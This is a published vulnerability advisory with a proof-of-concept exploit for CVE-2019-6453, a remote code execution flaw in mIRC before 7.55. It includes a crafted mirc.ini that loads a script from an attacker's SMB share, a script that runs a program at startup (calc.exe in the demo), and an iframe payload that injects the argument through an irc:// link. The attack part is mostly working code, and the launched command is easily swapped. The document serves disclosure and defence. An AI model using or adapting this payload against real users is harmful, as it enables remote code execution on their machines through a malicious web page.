mIRC Remote Command Execution

`# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers  
# Date: 18/02/2019  
# Exploit Author: https://twitter.com/proofofcalc/  
# Vendor Homepage: https://www.mirc.com  
# Software Link: https://www.mirc.com/get.php  
# Version: < 7.55  
# Tested on: Windows  
# CVE : CVE-2019-6453  
  
RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)  
===============================================================  
  
Severity: High  
  
mIRC has been shown to be vulnerable to argument injection through its  
associated URI protocol handlers that improperly escape their parameters.  
Usingavailable command-line parameters, an attacker is able to load a remote  
configuration file and to automatically run arbitrary code.  
  
Because mIRC doesn't use any kind of sigil such as -- to mark  
the end of the argument list, an attacker is able to pass arguments to mIRC  
through a irc:// link and execute arbitrary code by loading a custom  
mirc.ini  
from an attacker-controlled Samba file server. Please note that ircs://  
works  
the same way.  
  
  
PoC  
===  
  
The proof of calc requires three files: mirc.ini, calc.ini and poc.html.  
We assume a Samba file server is running on the attacker's side. For the  
sake of the example, the following pieces of code assume it is running on  
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in  
the following files to try this out).  
  
mirc.ini  
========  
  
mirc.ini is a custom configuration file that should be located at  
C:\mirc-poc\mirc.ini  
on the file server.  
  
[rfiles]  
n2=\\127.0.0.1\C$\mirc-poc\calc.ini  
  
calc.ini  
========  
  
calc.ini is a remote script file that should be located at  
C:\mirc-poc\calc.ini on the  
file server.  
  
[script]  
n0=on *:START: {  
n1= /run calc.exe  
n2=}  
  
poc.html  
========  
  
Just visiting poc.html should work assuming mIRC is set as the default  
handler for the  
irc:// URI scheme and the browser does not encode the payload. Depending  
on the browser  
and your configuration, you might still get a prompt (not the case on  
Firefox).  
  
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />  
  
Affected versions  
=================  
  
This PoC runs for mIRC <7.55.  
  
You can trigger the PoC on Edge 42.17134 (last preview version) and  
Firefox 64.0.2  
(last release). It doesn't work on Chrome because the way Chrome handle  
URI protocols  
(URI is encoded before being passed to the application).  
  
References  
==========  
  
Further explanation (including proof of concept code):  
  
Write-up:  
https://proofofcalc.com/cve-2019-6453-mIRC/  
  
PoC:  
https://github.com/proofofcalc/cve-2019-6453-poc  
  
mIRC changelog:  
https://www.mirc.com/whatsnew.txt  
  
Authors  
=======  
  
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)  
`